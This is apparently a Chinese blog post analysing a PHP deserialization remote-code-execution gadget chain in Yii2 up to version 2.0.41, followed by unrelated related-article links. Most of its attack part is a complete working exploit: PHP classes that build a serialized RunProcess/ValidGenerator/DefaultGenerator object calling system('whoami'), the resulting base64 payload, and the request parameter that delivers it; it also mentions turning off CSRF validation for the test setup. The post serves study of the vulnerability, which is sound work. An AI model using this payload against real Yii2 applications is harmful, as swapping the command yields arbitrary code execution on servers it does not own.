• Yii2 反序列化远程代码执行 POP链


    前言:巩固POP链

    影响版本:yii2 version <= 2.0.41

    搭建的时候注意出现 Unable to verify your data submission,只需要在对应的控制器下填上public $enableCsrfValidation=false;,关闭CSRF验证即可

    翻看了下__destruct,能够利用的好像也就只有RunProcess类了,其他类基本都给设定了__wakeup来限制反序列化

    跟进stopProcess函数,如下所示,$this->processes可控,那么也就是$process可控,从而$process->isRunning()可以调用任意类的__call方法

    找到一个__call的方法满足我们的需求,ValidGenerator类中的__call方法,可以看到 $this->generator $this->validator $this->maxRetries变量都可以控制,如果$res可以控制的话那么就可以执行命令了

    通过这条$res = call_user_func_array([$this->generator, $name], $arguments);,我们再找一个__call方法来返回值给$res那么就可以了,这里找的是DefaultGenerator类

    构造EXP:

    首先用到的第一个类是RunProcess,命名空间是在CodeceptionExtension中,且$this->processes可控,内容需要放一个ValidGenerator对象,ValidGenerator对象的构造参数也需要控制

    namespace CodeceptionExtension;
    use FakerValidGenerator;
    class RunProcess{
        private $processes = [];
        function __construct($command,$argv)
        {
            $this->processes[] = new ValidGenerator($command,$argv);
        }
    }
    

    第二个则是ValidGenerator,DefaultGenerator类,该类的命名空间处于Faker中,且其中的三个属性都需要控制,$this->generator需要DefaultGenerator类的对象,DefaultGenerator对象的构造参数为要执行的命令

    namespace Faker;
    class DefaultGenerator{
        protected $default ;
        function __construct($argv)
        {
            $this->default = $argv;
        }
    }
    
    class ValidGenerator{
        protected $generator;
        protected $validator;
        protected $maxRetries;
        function __construct($command,$argv)
        {
            $this->generator = new DefaultGenerator($argv);
            $this->validator = $command;
            $this->maxRetries = 99999999;
        }
    }
    

    最终的EXP如下:

    <?php
    
    namespace Faker;
    class DefaultGenerator{
        protected $default ;
        function __construct($argv)
        {
            $this->default = $argv;
        }
    }
    
    class ValidGenerator{
        protected $generator;
        protected $validator;
        protected $maxRetries;
        function __construct($command,$argv)
        {
            $this->generator = new DefaultGenerator($argv);
            $this->validator = $command;
            $this->maxRetries = 99999999;
        }
    }
    
    
    namespace CodeceptionExtension;
    use FakerValidGenerator;
    class RunProcess{
        private $processes = [];
        function __construct($command,$argv)
        {
            $this->processes[] = new ValidGenerator($command,$argv);
        }
    }
    
    $exp = new RunProcess('system','whoami');
    echo(base64_encode(serialize($exp)));
    
    //TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
    
    

    这条POP链比较简单,如下分析:

    code=TzozMjoiQ29kZWNlcHRpb25cRXh0ZW5zaW9uXFJ1blByb2Nlc3MiOjE6e3M6NDM6IgBDb2RlY2VwdGlvblxFeHRlbnNpb25cUnVuUHJvY2VzcwBwcm9jZXNzZXMiO2E6MTp7aTowO086MjA6IkZha2VyXFZhbGlkR2VuZXJhdG9yIjozOntzOjEyOiIAKgBnZW5lcmF0b3IiO086MjI6IkZha2VyXERlZmF1bHRHZW5lcmF0b3IiOjE6e3M6MTA6IgAqAGRlZmF1bHQiO3M6Njoid2hvYW1pIjt9czoxMjoiACoAdmFsaWRhdG9yIjtzOjY6InN5c3RlbSI7czoxMzoiACoAbWF4UmV0cmllcyI7aTo5OTk5OTk5OTt9fX0=
    

    分析到这不由得叹息大佬们还是厉害得,自己去把yii2框架的wakeup和destruct看了下,感觉基本没有可以利用的了,不知道之后会不会再有。。

    参考文章:https://xz.aliyun.com/t/9420

  • 相关阅读:
    关于《浪潮之巅》
    C++知识点
    #ifndef/#define/#endif以及#if defined/#else/#endif使用详解
    typedef void(*Fun)(void);
    C#-StructLayoutAttribute(结构体布局)
    Web Services
    C# DataGridView
    VS2017编译boost库
    位与字节
    c++ map
  • 原文地址:https://www.cnblogs.com/zpchcbd/p/14714606.html
Copyright © 2020-2023  润新知